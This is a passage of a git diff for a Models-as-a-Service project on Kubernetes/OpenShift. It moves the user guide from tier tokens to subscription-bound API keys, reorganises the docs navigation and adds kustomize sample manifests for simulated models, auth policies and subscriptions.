+  "${MAAS_API_URL}/maas-api/v1/api-keys")
 
-ACCESS_TOKEN=$(echo $TOKEN_RESPONSE | jq -r .token)
+API_KEY=$(echo $API_KEY_RESPONSE | jq -r .key)
+SUBSCRIPTION=$(echo $API_KEY_RESPONSE | jq -r .subscription)
 
-echo $ACCESS_TOKEN
+echo "Key prefix: ${API_KEY:0:16}..."
+echo "Bound subscription: ${SUBSCRIPTION}"
 ```
 
-### Token Lifecycle
+Replace `simulator-subscription` with your MaaSSubscription metadata name, or remove the `subscription` field to bind the **highest-priority** subscription you can access.
+
+!!! warning "API key shown only once"
+    The plaintext API key is returned **only at creation time**. We do not store the API key, so there is no way to retrieve it again. Store it securely when it is displayed. If you run into errors, see [Troubleshooting](../install/troubleshooting.md).
+
+### API Key Lifecycle
 
-- **Default lifetime**: 4 hours (configurable when requesting)
-- **Maximum lifetime**: Determined by cluster configuration
-- **Refresh**: Request a new token before expiration
-- **Revocation**: Tokens can be revoked if compromised
+- **Permanent keys**: Omit `expiresIn` in the request body
+- **Expiring keys**: Set `expiresIn` (e.g., `"90d"`, `"1h"`, `"30d"`)
+- **Subscription**: Fixed at creation; mint a new key to change it
+- **Revocation**: Revoke via `DELETE /v1/api-keys/{id}` if compromised
 
 ## Discovering Models
 
 ### List Available Models
 
-Get a list of models available to your tier:
+Get a list of models available to your subscription:
 
 ```bash
 MODELS=$(curl "${MAAS_API_URL}/v1/models" \
     -H "Content-Type: application/json" \
-    -H "Authorization: Bearer ${ACCESS_TOKEN}")
+    -H "Authorization: Bearer ${API_KEY}")
 
 echo $MODELS | jq .
 ```
@@ -73,13 +83,13 @@ Example response:
       "id": "simulator",
       "name": "Simulator Model",
       "url": "https://gateway.your-domain.com/simulator/v1/chat/completions",
-      "tier": "free"
+      "subscription": "free"
     },
     {
       "id": "qwen3",
       "name": "Qwen3 Model",
       "url": "https://gateway.your-domain.com/qwen3/v1/chat/completions",
-      "tier": "premium"
+      "subscription": "premium"
     }
   ]
 }
@@ -92,7 +102,7 @@ Get detailed information about a specific model:
 ```bash
 MODEL_ID="simulator"
 MODEL_INFO=$(curl "${MAAS_API_URL}/v1/models" \
-    -H "Authorization: Bearer ${ACCESS_TOKEN}" | \
+    -H "Authorization: Bearer ${API_KEY}" | \
     jq --arg model "$MODEL_ID" '.data[] | select(.id == $model)')
 
 echo $MODEL_INFO | jq .
@@ -100,6 +110,8 @@ echo $MODEL_INFO | jq .
 
 ## Making Inference Requests
 
+Use **only** your API key in `Authorization: Bearer`. The subscription is fixed when the key was created.
+
 ### Basic Chat Completion
 
 Make a simple chat completion request:
@@ -108,12 +120,12 @@ Make a simple chat completion request:
 # First, get the model URL from the models endpoint
 MODELS=$(curl "${MAAS_API_URL}/v1/models" \
     -H "Content-Type: application/json" \
-    -H "Authorization: Bearer ${ACCESS_TOKEN}")
+    -H "Authorization: Bearer ${API_KEY}")
 MODEL_URL=$(echo $MODELS | jq -r '.data[0].url')
 MODEL_NAME=$(echo $MODELS | jq -r '.data[0].id')
 
 curl -sSk \
-  -H "Authorization: Bearer ${ACCESS_TOKEN}" \
+  -H "Authorization: Bearer ${API_KEY}" \
   -H "Content-Type: application/json" \
   -d "{
         \"model\": \"${MODEL_NAME}\",
@@ -134,7 +146,7 @@ For streaming responses, add `"stream": true` to the request and use `--no-buffe
 
 ```bash
 curl -sSk --no-buffer \
-  -H "Authorization: Bearer ${ACCESS_TOKEN}" \
+  -H "Authorization: Bearer ${API_KEY}" \
   -H "Content-Type: application/json" \
   -d "{
         \"model\": \"${MODEL_NAME}\",
@@ -152,20 +164,14 @@ curl -sSk --no-buffer \
 
 ## Understanding Your Access Level
 
-Your access is determined by your **tier**, which controls:
+Your access is determined by your **subscription**, which controls:
 
 - **Available models** - Which AI models you can use
 - **Request limits** - How many requests per minute
 - **Token limits** - Maximum tokens per request
 - **Features** - Advanced capabilities available
 
-### Default Tiers
-
-| Tier | Requests/min | Tokens/min |
-|------|--------------|------------|
-| Free | 5 | 100 |
-| Premium | 20 | 50,000 |
-| Enterprise | 50 | 100,000 |
+Rate limits are configured per-model in MaaSAuthPolicy and MaaSSubscription. Contact your administrator for your subscription's limits.
 
 ## Error Handling
 
@@ -214,7 +220,7 @@ Check your current usage through response headers:
 ```bash
 # Make a request and check headers
 curl -I -sSk \
-  -H "Authorization: Bearer ${ACCESS_TOKEN}" \
+  -H "Authorization: Bearer ${API_KEY}" \
   -H "Content-Type: application/json" \
   -d '{"model": "simulator", "messages": [{"role": "user", "content": "test"}]}' \
   "${MODEL_URL}/v1/chat/completions" | grep -i "x-ratelimit"
@@ -226,29 +232,29 @@ curl -I -sSk \
 
 **Problem**: `401 Unauthorized`
 
-**Solution**: Check your token and ensure it's correctly formatted:
+**Solution**: Check your API key and ensure it's correctly formatted:
 
 ```bash
 # Correct format
--H "Authorization: Bearer YOUR_TOKEN"
+-H "Authorization: Bearer YOUR_API_KEY"
 
 # Wrong format
--H "Authorization: YOUR_TOKEN"
+-H "Authorization: YOUR_API_KEY"
 ```
 
 ### Rate Limit Exceeded
 
 **Problem**: `429 Too Many Requests`
 
-**Solution**: Wait before making more requests, or contact your administrator to upgrade your tier.
+**Solution**: Wait before making more requests, or contact your administrator to adjust your subscription limits.
 
 ### Model Not Available
 
 **Problem**: `404 Model Not Found`
 
-**Solution**: Check which models are available in your tier:
+**Solution**: Check which models are available in your subscription:
 
 ```bash
 curl -X GET "${MAAS_API_URL}/v1/models" \
-  -H "Authorization: Bearer ${ACCESS_TOKEN}"
+  -H "Authorization: Bearer ${API_KEY}"
 ```
diff --git a/docs/mkdocs.yml b/docs/mkdocs.yml
index e29b46831..ea59224f5 100644
--- a/docs/mkdocs.yml
+++ b/docs/mkdocs.yml
@@ -41,6 +41,9 @@ theme:
         name: Switch to dark mode
 
 plugins:
+  - swagger-ui-tag:
+      docExpansion: list
+      tryItOutEnabled: true
   - search:
       lang: en
       separator: '[\s\u200b\-_,:!=\[\]()"`/]+|\.(?!\d)|&[lg]t;|(?!\b)(?=[A-Z][a-z])'
@@ -48,34 +51,47 @@ plugins:
       enable_creation_date: true
 
 nav:
-  - Home: index.md
-  - Quick Start: quickstart.md
-  - Architecture: architecture.md
-  - Administrator Guide:
+  - Home:
+    - index.md
+    - Release Notes: release-notes/index.md
+    - Migration:
+      - Tier to Subscription: migration/tier-to-subscription.md
+  - Concepts:
+    - Architecture: architecture.md
+    - Access and Quota Overview: configuration-and-management/subscription-overview.md
+    - MaaS Models: configuration-and-management/maas-models.md
+  - Install:
+    - Quick Start: quickstart.md
     - Prerequisites:
       - Overview: install/prerequisites.md
       - Operator Setup: install/platform-setup.md
     - Installation:
       - Models-as-a-Service: install/maas-setup.md
+      - Model Setup (On Cluster): install/model-setup.md
       - Validation: install/validation.md
+      - Troubleshooting: install/troubleshooting.md
+  - Administration Guide:
     - Configuration & Management:
-      - Tier Management: configuration-and-management/tier-overview.md
-      - Tier Configuration: configuration-and-management/tier-configuration.md
-      - Tier Concepts: configuration-and-management/tier-concepts.md
+      - Quota and Access Configuration: configuration-and-management/quota-and-access-configuration.md
       - Token Management: configuration-and-management/token-management.md
       - TLS Configuration: configuration-and-management/tls-configuration.md
-    - Model Setup: configuration-and-management/model-setup.md
-    - Model Listing Flow: configuration-and-management/model-listing-flow.md
-    - MaaSModelRef Kinds (future): configuration-and-management/maas-model-kinds.md
-    - Known Issues:
-      - Group Membership: configuration-and-management/group-membership-known-issues.md
-      - Tier Modification: configuration-and-management/tier-modification-known-issues.md
-      - Model Access: configuration-and-management/model-access-behavior.md
+    - Models:
+      - Model Setup (On Cluster): configuration-and-management/model-setup.md
+      - Model Listing Flow: configuration-and-management/model-listing-flow.md
     - Advanced Administration:
       - Observability: advanced-administration/observability.md
       - Limitador Persistence: advanced-administration/limitador-persistence.md
-  - End User Guide:
+      - Subscription Cardinality: advanced-administration/subscription-cardinality.md
+  - User Guide:
     - Self Service Model Access: user-guide/self-service-model-access.md
+  - API Reference:
+    - MaaS API Overview: reference/maas-api-overview.md
+    - MaaS API (Swagger): reference/api-reference.md
+    - MaaS CRDs:
+      - MaaSModelRef: reference/crds/maas-model-ref.md
+      - ExternalModel: reference/crds/external-model.md
+      - MaaSAuthPolicy: reference/crds/maas-auth-policy.md
+      - MaaSSubscription: reference/crds/maas-subscription.md
 
 extra:
   version:
diff --git a/docs/requirements.txt b/docs/requirements.txt
index 97c33b3c5..0779fa20a 100644
--- a/docs/requirements.txt
+++ b/docs/requirements.txt
@@ -1,4 +1,5 @@
 mkdocs>=1.5.0,<2.0
 mkdocs-material>=9.0.0
 mkdocs-git-revision-date-localized-plugin>=1.2.0
+mkdocs-swagger-ui-tag>=0.7.0
 mike>=2.0.0
diff --git a/docs/samples/maas-system/README.md b/docs/samples/maas-system/README.md
index b0cff7afc..3a44b40e6 100644
--- a/docs/samples/maas-system/README.md
+++ b/docs/samples/maas-system/README.md
@@ -2,27 +2,32 @@
 
 Bundled samples that deploy LLMInferenceService + MaaSModelRef + MaaSAuthPolicy + MaaSSubscription together so dependencies resolve correctly. LLMInferenceServices reference the existing [models/simulator](../models/simulator) and [models/simulator-premium](../models/simulator-premium) samples.
 
-## Tiers
+## Subscriptions
 
-| Tier | Group | Model | Token Limit |
-|------|-------|-------|-------------|
+| Sample | Group | Model | Token Limit |
+|--------|-------|-------|-------------|
 | **free** | system:authenticated | facebook-opt-125m-simulated | 100/min |
 | **premium** | premium-user | premium-simulated-simulated-premium | 1000/min |
+| **facebook-opt-125m-cpu** | system:authenticated | facebook-opt-125m-cpu-single-node-no-scheduler-cpu | 100/min |
+| **qwen3** | system:authenticated | qwen3-single-node-no-scheduler-nvidia-gpu | 100/min |
 
 ## Usage
 
 To deploy to default namespaces:
 
 ```bash
-# Create default namespaces if needed
+# Create model namespace (models-as-a-service namespace is auto-created by controller)
 kubectl create namespace llm --dry-run=client -o yaml | kubectl apply -f -
-kubectl create namespace models-as-a-service --dry-run=client -o yaml | kubectl apply -f -
 
 # Deploy all (LLMIS + MaaS CRs) at once
-kustomize build docs/samples/maas-system | kubectl apply -f -
+kustomize build docs/samples/maas-system/ | kubectl apply -f -
+
+# Or deploy a specific sample
+kustomize build docs/samples/maas-system/facebook-opt-125m-cpu/ | kubectl apply -f -
+kustomize build docs/samples/maas-system/qwen3/ | kubectl apply -f -
 
 # Verify
-kubectl get maasmodelref -n opendatahub
+kubectl get maasmodelref -n llm
 kubectl get maasauthpolicy,maassubscription -n models-as-a-service
 kubectl get llminferenceservice -n llm
 ```
@@ -30,15 +35,15 @@ kubectl get llminferenceservice -n llm
 To deploy MaaS CRs to another namespace:
 
 ```bash
-# Create llm and customized namespace if needed
+# Create model namespace (custom subscription namespace is auto-created by controller)
 kubectl create namespace llm --dry-run=client -o yaml | kubectl apply -f -
-kubectl create namespace my-namespace --dry-run=client -o yaml | kubectl apply -f -
 
+# Note: Configure controller with --maas-subscription-namespace=my-namespace to auto-create custom namespace
 # Deploy all (LLMIS + MaaS CRs) at once
 kustomize build docs/samples/maas-system | sed "s/namespace: models-as-a-service/namespace: my-namespace/g" | kubectl apply -f -
 
 # Verify
-kubectl get maasmodelref -n opendatahub
+kubectl get maasmodelref -n llm
 kubectl get maasauthpolicy,maassubscription -n my-namespace
 kubectl get llminferenceservice -n llm
 ```
diff --git a/docs/samples/maas-system/facebook-opt-125m-cpu/kustomization.yaml b/docs/samples/maas-system/facebook-opt-125m-cpu/kustomization.yaml
new file mode 100644
index 000000000..b19766004
--- /dev/null
+++ b/docs/samples/maas-system/facebook-opt-125m-cpu/kustomization.yaml
@@ -0,0 +1,6 @@
+apiVersion: kustomize.config.k8s.io/v1beta1
+kind: Kustomization
+
+resources:
+  - llm
+  - maas
diff --git a/docs/samples/maas-system/facebook-opt-125m-cpu/llm/kustomization.yaml b/docs/samples/maas-system/facebook-opt-125m-cpu/llm/kustomization.yaml
new file mode 100644
index 000000000..749c21764
--- /dev/null
+++ b/docs/samples/maas-system/facebook-opt-125m-cpu/llm/kustomization.yaml
@@ -0,0 +1,5 @@
+apiVersion: kustomize.config.k8s.io/v1beta1
+kind: Kustomization
+
+resources:
+  - ../../../models/facebook-opt-125m-cpu
diff --git a/docs/samples/maas-system/facebook-opt-125m-cpu/maas/kustomization.yaml b/docs/samples/maas-system/facebook-opt-125m-cpu/maas/kustomization.yaml
new file mode 100644
index 000000000..e1c827d39
--- /dev/null
+++ b/docs/samples/maas-system/facebook-opt-125m-cpu/maas/kustomization.yaml
@@ -0,0 +1,9 @@
+apiVersion: kustomize.config.k8s.io/v1beta1
+kind: Kustomization
+
+namespace: opendatahub
+
+resources:
+  - maas-model.yaml
+  - maas-auth-policy.yaml
+  - maas-subscription.yaml
diff --git a/docs/samples/maas-system/facebook-opt-125m-cpu/maas/maas-auth-policy.yaml b/docs/samples/maas-system/facebook-opt-125m-cpu/maas/maas-auth-policy.yaml
new file mode 100644
index 000000000..490c67fcd
--- /dev/null
+++ b/docs/samples/maas-system/facebook-opt-125m-cpu/maas/maas-auth-policy.yaml
@@ -0,0 +1,12 @@
+apiVersion: maas.opendatahub.io/v1alpha1
+kind: MaaSAuthPolicy
+metadata:
+  name: facebook-opt-125m-cpu-access
+  namespace: opendatahub
+spec:
+  modelRefs:
+    - facebook-opt-125m-cpu
+  subjects:
+    groups:
+      - name: system:authenticated
+    users: []
diff --git a/docs/samples/maas-system/facebook-opt-125m-cpu/maas/maas-model.yaml b/docs/samples/maas-system/facebook-opt-125m-cpu/maas/maas-model.yaml
new file mode 100644
index 000000000..9a92b2900
--- /dev/null
+++ b/docs/samples/maas-system/facebook-opt-125m-cpu/maas/maas-model.yaml
@@ -0,0 +1,10 @@
+apiVersion: maas.opendatahub.io/v1alpha1
+kind: MaaSModelRef
+metadata:
+  name: facebook-opt-125m-cpu
+  namespace: opendatahub
+spec:
+  modelRef:
+    kind: LLMInferenceService
+    name: facebook-opt-125m-cpu-single-node-no-scheduler-cpu
+    namespace: llm
diff --git a/docs/samples/maas-system/facebook-opt-125m-cpu/maas/maas-subscription.yaml b/docs/samples/maas-system/facebook-opt-125m-cpu/maas/maas-subscription.yaml
new file mode 100644
index 000000000..ac0345311
--- /dev/null
+++ b/docs/samples/maas-system/facebook-opt-125m-cpu/maas/maas-subscription.yaml
@@ -0,0 +1,15 @@
+apiVersion: maas.opendatahub.io/v1alpha1
+kind: MaaSSubscription
+metadata:
+  name: facebook-opt-125m-cpu-subscription
+  namespace: opendatahub
+spec:
+  owner:
+    groups:
+      - name: system:authenticated
+    users: []
+  modelRefs:
+    - name: facebook-opt-125m-cpu
+      tokenRateLimits:
+        - limit: 100
+          window: 1m
diff --git a/docs/samples/maas-system/free/maas/maas-auth-policy.yaml b/docs/samples/maas-system/free/maas/maas-auth-policy.yaml
index 0067b6174..9a8661caf 100644
--- a/docs/samples/maas-system/free/maas/maas-auth-policy.yaml
+++ b/docs/samples/maas-system/free/maas/maas-auth-policy.yaml
@@ -3,6 +3,9 @@ kind: MaaSAuthPolicy
 metadata:
   name: simulator-access
   namespace: models-as-a-service
+  annotations:
+    openshift.io/display-name: "Simulator Access (Free)"
+    openshift.io/description: "Grants all authenticated users access to the free-tier simulator model"
 spec:
   modelRefs:
     - name: facebook-opt-125m-simulated
diff --git a/docs/samples/maas-system/free/maas/maas-model.yaml b/docs/samples/maas-system/free/maas/maas-model.yaml
index be31046df..fccab70c5 100644
--- a/docs/samples/maas-system/free/maas/maas-model.yaml
+++ b/docs/samples/maas-system/free/maas/maas-model.yaml
@@ -3,6 +3,9 @@ kind: MaaSModelRef
 metadata:
   name: facebook-opt-125m-simulated
   namespace: llm
+  annotations:
+    openshift.io/display-name: "Facebook OPT 125M (Simulated)"
+    openshift.io/description: "A simulated OPT-125M model for free-tier testing"
 spec:
   modelRef:
     kind: LLMInferenceService
diff --git a/docs/samples/maas-system/free/maas/maas-subscription.yaml b/docs/samples/maas-system/free/maas/maas-subscription.yaml
index 167486d4f..b751a3cc7 100644
--- a/docs/samples/maas-system/free/maas/maas-subscription.yaml
+++ b/docs/samples/maas-system/free/maas/maas-subscription.yaml
@@ -3,6 +3,9 @@ kind: MaaSSubscription
 metadata:
   name: simulator-subscription
   namespace: models-as-a-service
+  annotations:
+    openshift.io/display-name: "Simulator Subscription (Free)"
+    openshift.io/description: "Free-tier subscription with 100 tokens/min rate limit"
 spec:
   owner:
     groups:
@@ -14,3 +17,4 @@ spec:
       tokenRateLimits:
         - limit: 100
           window: 1m
+  priority: 10
diff --git a/docs/samples/maas-system/kustomization.yaml b/docs/samples/maas-system/kustomization.yaml
index d7b426d3f..c0ff10261 100644
--- a/docs/samples/maas-system/kustomization.yaml
+++ b/docs/samples/maas-system/kustomization.yaml
@@ -1,12 +1,10 @@
 # Bundled MaaS system: LLMInferenceService + MaaSModelRef + MaaSAuthPolicy + MaaSSubscription
-# per tier. Deploy all at once so dependencies resolve correctly.
+# per subscription. Deploy all at once so dependencies resolve correctly.
 # - free: system:authenticated, 100 tokens/min
 # - premium: premium-user, 1000 tokens/min
-# - unconfigured: no auth/subscription (e2e tests validate 403)
 apiVersion: kustomize.config.k8s.io/v1beta1
 kind: Kustomization
 
 resources:
   - free
   - premium
-  - unconfigured
diff --git a/docs/samples/maas-system/premium/maas/maas-auth-policy.yaml b/docs/samples/maas-system/premium/maas/maas-auth-policy.yaml
index b02112d6f..c44de7d09 100644
--- a/docs/samples/maas-system/premium/maas/maas-auth-policy.yaml
+++ b/docs/samples/maas-system/premium/maas/maas-auth-policy.yaml
@@ -3,6 +3,9 @@ kind: MaaSAuthPolicy
 metadata:
   name: premium-simulator-access
   namespace: models-as-a-service
+  annotations:
+    openshift.io/display-name: "Premium Simulator Access"
+    openshift.io/description: "Grants premium-user group access to the premium simulator model"
 spec:
   modelRefs:
     - name: premium-simulated-simulated-premium
diff --git a/docs/samples/maas-system/premium/maas/maas-model.yaml b/docs/samples/maas-system/premium/maas/maas-model.yaml
index 67a97b978..fe30ff8b5 100644
--- a/docs/samples/maas-system/premium/maas/maas-model.yaml
+++ b/docs/samples/maas-system/premium/maas/maas-model.yaml
@@ -1,10 +1,13 @@
-# MaaSModelRef for the premium-tier simulator.
+# MaaSModelRef for the premium subscription simulator.
 # LLMIS from docs/samples/models/simulator-premium (name: premium-simulated-simulated-premium in namespace llm).
 apiVersion: maas.opendatahub.io/v1alpha1
 kind: MaaSModelRef
 metadata:
   name: premium-simulated-simulated-premium
   namespace: llm
+  annotations:
+    openshift.io/display-name: "Premium Simulator"
+    openshift.io/description: "A simulated model for premium-tier testing"
 spec:
   modelRef:
     kind: LLMInferenceService
diff --git a/docs/samples/maas-system/premium/maas/maas-subscription.yaml b/docs/samples/maas-system/premium/maas/maas-subscription.yaml
index 56452770c..b60d0abbc 100644
--- a/docs/samples/maas-system/premium/maas/maas-subscription.yaml
+++ b/docs/samples/maas-system/premium/maas/maas-subscription.yaml
@@ -3,6 +3,9 @@ kind: MaaSSubscription
 metadata:
   name: premium-simulator-subscription
   namespace: models-as-a-service
+  annotations:
+    openshift.io/display-name: "Premium Simulator Subscription"
+    openshift.io/description: "Premium-tier subscription with 1000 tokens/min rate limit"
 spec:
   owner:
     groups:
@@ -14,3 +17,4 @@ spec:
       tokenRateLimits:
         - limit: 1000
           window: 1m
+  priority: 20
diff --git a/docs/samples/maas-system/qwen3/kustomization.yaml b/docs/samples/maas-system/qwen3/kustomization.yaml
new file mode 100644
index 000000000..b19766004
--- /dev/null
+++ b/docs/samples/maas-system/qwen3/kustomization.yaml
@@ -0,0 +1,6 @@
+apiVersion: kustomize.config.k8s.io/v1beta1
+kind: Kustomization
+
+resources:
+  - llm
+  - maas
diff --git a/docs/samples/maas-system/qwen3/llm/kustomization.yaml b/docs/samples/maas-system/qwen3/llm/kustomization.yaml
new file mode 100644
index 000000000..f53aeed60
--- /dev/null
+++ b/docs/samples/maas-system/qwen3/llm/kustomization.yaml
@@ -0,0 +1,5 @@
+apiVersion: kustomize.config.k8s.io/v1beta1
+kind: Kustomization
+
+resources:
+  - ../../../models/qwen3
diff --git a/docs/samples/maas-system/qwen3/maas/kustomization.yaml b/docs/samples/maas-system/qwen3/maas/kustomization.yaml
new file mode 100644
index 000000000..e1c827d39
--- /dev/null
+++ b/docs/samples/maas-system/qwen3/maas/kustomization.yaml
@@ -0,0 +1,9 @@
+apiVersion: kustomize.config.k8s.io/v1beta1
+kind: Kustomization
+
+namespace: opendatahub
+
+resources:
+  - maas-model.yaml
+  - maas-auth-policy.yaml
+  - maas-subscription.yaml
diff --git a/docs/samples/maas-system/qwen3/maas/maas-auth-policy.yaml b/docs/samples/maas-system/qwen3/maas/maas-auth-policy.yaml
new file mode 100644
index 000000000..a8c193df5
--- /dev/null
+++ b/docs/samples/maas-system/qwen3/maas/maas-auth-policy.yaml
@@ -0,0 +1,12 @@
+apiVersion: maas.opendatahub.io/v1alpha1
+kind: MaaSAuthPolicy
+metadata:
+  name: qwen3-access
+  namespace: opendatahub
+spec:
+  modelRefs:
+    - qwen3
+  subjects:
+    groups:
+      - name: system:authenticated
+    users: []
diff --git a/docs/samples/maas-system/qwen3/maas/maas-model.yaml b/docs/samples/maas-system/qwen3/maas/maas-model.yaml
new file mode 100644
index 000000000..42cb360b6
--- /dev/null
+++ b/docs/samples/maas-system/qwen3/maas/maas-model.yaml
@@ -0,0 +1,10 @@
+apiVersion: maas.opendatahub.io/v1alpha1
+kind: MaaSModelRef
+metadata:
+  name: qwen3
+  namespace: opendatahub
+spec:
+  modelRef:
+    kind: LLMInferenceService
+    name: qwen3-single-node-no-scheduler-nvidia-gpu
+    namespace: llm
diff --git a/docs/samples/maas-system/qwen3/maas/maas-subscription.yaml b/docs/samples/maas-system/qwen3/maas/maas-subscription.yaml
new file mode 100644
index 000000000..a4ac4145c
--- /dev/null
+++ b/docs/samples/maas-system/qwen3/maas/maas-subscription.yaml
@@ -0,0 +1,15 @@
+apiVersion: maas.opendatahub.io/v1alpha1
+kind: MaaSSubscription
+metadata:
+  name: qwen3-subscription
+  namespace: opendatahub
+spec:
+  owner:
+    groups:
+      - name: system:authenticated
+    users: []
+  modelRefs:
+    - name: qwen3
+      tokenRateLimits:
+        - limit: 100
+          window: 1m
diff --git a/docs/samples/models/README.md b/docs/samples/models/README.md
index a867588eb..3fa3d4981 100644
--- a/docs/samples/models/README.md
+++ b/docs/samples/models/README.md
@@ -2,12 +2,12 @@
 
 This directory contains `LLMInferenceService`s for deploying sample models. Please refer to the [deployment guide](../../content/quickstart.md) for more details on how to test the MaaS Platform with these models.
 
-> **TODO (ODH model controller):** Update the ODH model controller to remove or modify the existing webhook that validates tier annotations (`alpha.maas.opendatahub.io/tiers`). The webhook currently blocks HTTPRoutes when AuthPolicy is not enforced (e.g., Kuadrant not installed), requiring `security.opendatahub.io/enable-auth=false`. For MaaS-managed models, tier/access control is handled by MaaSAuthPolicy and MaaSSubscription rather than LLMInferenceService annotations. The webhook should not apply automation or block models that are managed by MaaS. See JIRA: [TBD]
+> **TODO (ODH model controller):** Update the ODH model controller to remove or modify the existing webhook that validates access annotations (`alpha.maas.opendatahub.io/tiers`). The webhook currently blocks HTTPRoutes when AuthPolicy is not enforced (e.g., Kuadrant not installed), requiring `security.opendatahub.io/enable-auth=false`. For MaaS-managed models, access control is handled by MaaSAuthPolicy and MaaSSubscription rather than LLMInferenceService annotations. The webhook should not apply automation or block models that are managed by MaaS. See JIRA: [TBD]
 
 ## Available Models
 
 - **simulator** - Simple simulator for testing
-- **simulator-premium** - Premium simulator for testing tier-based access (configured via MaaSAuthPolicy)
+- **simulator-premium** - Premium simulator for testing subscription-based access (configured via MaaSAuthPolicy)
 - **facebook-opt-125m-cpu** - Facebook OPT 125M model (CPU-based)
 - **qwen3** - Qwen3 model (GPU-based with autoscaling)
 - **ibm-granite-2b-gpu** - IBM Granite 2B Instruct model (GPU-based, supports instructions)
@@ -55,7 +55,7 @@ The two simulator models can be distinguished by:
   - Standard: `facebook-opt-125m-simulated`
   - Premium: `premium-simulated-simulated-premium`
 
-Tier-based access is configured via MaaSAuthPolicy and MaaSSubscription (see [docs/samples/maas-system/](../maas-system/)), not via LLMInferenceService annotations.
+Subscription-based access is configured via MaaSAuthPolicy and MaaSSubscription (see [docs/samples/maas-system/](../maas-system/)), not via LLMInferenceService annotations.
 
 ### Verifying Deployment
 
diff --git a/docs/samples/models/e2e-distinct-2-simulated/kustomization.yaml b/docs/samples/models/e2e-distinct-2-simulated/kustomization.yaml
new file mode 100644
index 000000000..02fc82420
--- /dev/null
+++ b/docs/samples/models/e2e-distinct-2-simulated/kustomization.yaml
@@ -0,0 +1,7 @@
+apiVersion: kustomize.config.k8s.io/v1beta1
+kind: Kustomization
+
+namespace: llm
+
+resources:
+  - model.yaml
diff --git a/docs/samples/models/e2e-distinct-2-simulated/model.yaml b/docs/samples/models/e2e-distinct-2-simulated/model.yaml
new file mode 100644
index 000000000..0821d0cb1
--- /dev/null
+++ b/docs/samples/models/e2e-distinct-2-simulated/model.yaml
@@ -0,0 +1,65 @@
+apiVersion: serving.kserve.io/v1alpha1
+kind: LLMInferenceService
+metadata:
+  name: e2e-distinct-2-simulated
+spec:
+  model:
+    uri: hf://sshleifer/tiny-gpt2 # ~2MB test model, simulator ignores it anyway
+    name: test/e2e-distinct-model-2
+  replicas: 1
+  router:
+    route: {}
+    # Connect to MaaS-enabled gateway
+    gateway:
+      refs:
+        - name: maas-default-gateway
+          namespace: openshift-ingress
+  template:
+    containers:
+      - name: main
+        image: "ghcr.io/llm-d/llm-d-inference-sim:v0.7.1"
+        imagePullPolicy: Always
+        command: ["/app/llm-d-inference-sim"]
+        args:
+        - --port
+        - "8000"
+        - --model
+        - test/e2e-distinct-model-2
+        - --mode
+        - random
+        - --ssl-certfile
+        - /var/run/kserve/tls/tls.crt
+        - --ssl-keyfile
+        - /var/run/kserve/tls/tls.key
+        env:
+          - name: POD_NAME
+            valueFrom:
+              fieldRef:
+                apiVersion: v1
+                fieldPath: metadata.name
+          - name: POD_NAMESPACE
+            valueFrom:
+              fieldRef:
+                apiVersion: v1
+                fieldPath: metadata.namespace
+        ports:
+          - name: https
+            containerPort: 8000
+            protocol: TCP
+        livenessProbe:
+          httpGet:
+            path: /health
+            port: https
+            scheme: HTTPS
+        resources:
+          requests:
+            cpu: 100m
+            memory: 256Mi
+          limits:
+            cpu: 500m
+            memory: 512Mi
+        readinessProbe:
+          httpGet:
+            path: /ready
+            port: https
+            scheme: HTTPS
diff --git a/docs/samples/models/e2e-distinct-simulated/kustomization.yaml b/docs/samples/models/e2e-distinct-simulated/kustomization.yaml
new file mode 100644
index 000000000..02fc82420
--- /dev/null
+++ b/docs/samples/models/e2e-distinct-simulated/kustomization.yaml
@@ -0,0 +1,7 @@
+apiVersion: kustomize.config.k8s.io/v1beta1
+kind: Kustomization
+
+namespace: llm
+
+resources:
+  - model.yaml
diff --git a/docs/samples/models/e2e-distinct-simulated/model.yaml b/docs/samples/models/e2e-distinct-simulated/model.yaml
new file mode 100644
index 000000000..4e1164b9a
--- /dev/null
+++ b/docs/samples/models/e2e-distinct-simulated/model.yaml
@@ -0,0 +1,65 @@
+apiVersion: serving.kserve.io/v1alpha1
+kind: LLMInferenceService
+metadata:
+  name: e2e-distinct-simulated
+spec:
+  model:
+    uri: hf://sshleifer/tiny-gpt2 # ~2MB test model, simulator ignores it anyway
+    name: test/e2e-distinct-model
+  replicas: 1
+  router:
+    route: {}
+    # Connect to MaaS-enabled gateway
+    gateway:
+      refs:
+        - name: maas-default-gateway
+          namespace: openshift-ingress
+  template:
+    containers:
+      - name: main
+        image: "ghcr.io/llm-d/llm-d-inference-sim:v0.7.1"
+        imagePullPolicy: Always
+        command: ["/app/llm-d-inference-sim"]
+        args:
+        - --port
+        - "8000"
+        - --model
+        - test/e2e-distinct-model
+        - --mode
+        - random
+        - --ssl-certfile
+        - /var/run/kserve/tls/tls.crt
+        - --ssl-keyfile
+        - /var/run/kserve/tls/tls.key
+        env:
+          - name: POD_NAME
+            valueFrom:
+              fieldRef:
+                apiVersion: v1
+                fieldPath: metadata.name
+          - name: POD_NAMESPACE
+            valueFrom:
+              fieldRef:
+                apiVersion: v1
+                fieldPath: metadata.namespace
+        ports:
+          - name: https
+            containerPort: 8000
+            protocol: TCP
+        livenessProbe:
+          httpGet:
+            path: /health
+            port: https
+            scheme: HTTPS
+        resources:
+          requests:
+            cpu: 100m
+            memory: 256Mi
+          limits:
+            cpu: 500m
+            memory: 512Mi
+        readinessProbe:
+          httpGet:
+            path: /ready
+            port: https
+            scheme: HTTPS
diff --git a/docs/samples/models/simulator-premium/kustomization.yaml b/docs/samples/models/simulator-premium/kustomization.yaml
index 187432c12..c5c6cde6c 100644
--- a/docs/samples/models/simulator-premium/kustomization.yaml
+++ b/docs/samples/models/simulator-premium/kustomization.yaml
@@ -2,7 +2,7 @@ apiVersion: kustomize.config.k8s.io/v1beta1
 kind: Kustomization
 
 metadata:
-  name: premium-tier-simulated-model
+  name: premium-simulated-model
 
 namespace: llm
 
diff --git a/maas-api/README.md b/maas-api/README.md
index dda633c5f..ad4934855 100644
--- a/maas-api/README.md
+++ b/maas-api/README.md
@@ -151,7 +151,7 @@ kustomize build ${PROJECT_DIR}/docs/samples/models/simulator | kubectl apply --s
 MaaS API supports two types of tokens:
 
 1.  **Ephemeral Tokens** - Stateless tokens that provide better security posture as they can be easily refreshed by the caller using OpenShift Identity. These tokens can live as long as API keys (up to the configured expiration), making them suitable for both temporary and long-term access scenarios.
-2.  **API Keys** - Named, long-lived tokens for applications (stored in SQLite database). Suitable for services or applications that need persistent access with metadata tracking.
+2.  **API Keys** - Named, long-lived tokens for applications (stored in PostgreSQL database). Suitable for services or applications that need persistent access with metadata tracking.
 
